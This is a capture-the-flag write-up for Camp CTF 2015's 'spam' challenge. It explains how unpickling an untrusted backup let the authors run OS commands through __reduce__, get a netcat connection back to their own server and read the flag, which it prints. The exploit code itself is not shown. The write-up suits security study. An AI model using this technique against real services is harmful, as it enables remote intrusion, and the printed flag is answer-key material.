Camp CTF 2015 – spam

Description

CTF: Camp CTF 2015
Title: spam
Category: pwn
Points: 75
Location: nc challs.campctf.ccc.ac 10113
Description:
You have problems remembering all your different passwords?
Here is THE tool for you!

Solution

Basically, this service help you to list/add/delete entries that contains a password together with the URL where this password is used.

We quickly identified the vulnerability with pickle. Pickle is a module used for serializing and de-serialising Python object structures.

pickle is used in this service to save and restore backup. However, when restored, the de-serialised object structure is not verified. While the script is expecting a dict(), we could send another object structure instead that once pickled, executes an OS command (thanks to the __reduce__ ). Many exploits for pickle misuse are available, but we decided to use this one:

The result is:

This base64 is then sent as a string to the restore_backup() function that will decode, unzip and pickle the serialised class Exploit().

Before “restoring” the backup, I used netcat to listen on port 10008 on the Pacman’s server. Once the connection established, I list the content then cat flag.txt:

 Flag: CAMP15_76b5fad40644ac0616b301454250c408

Leave a Reply

Your email address will not be published. Required fields are marked *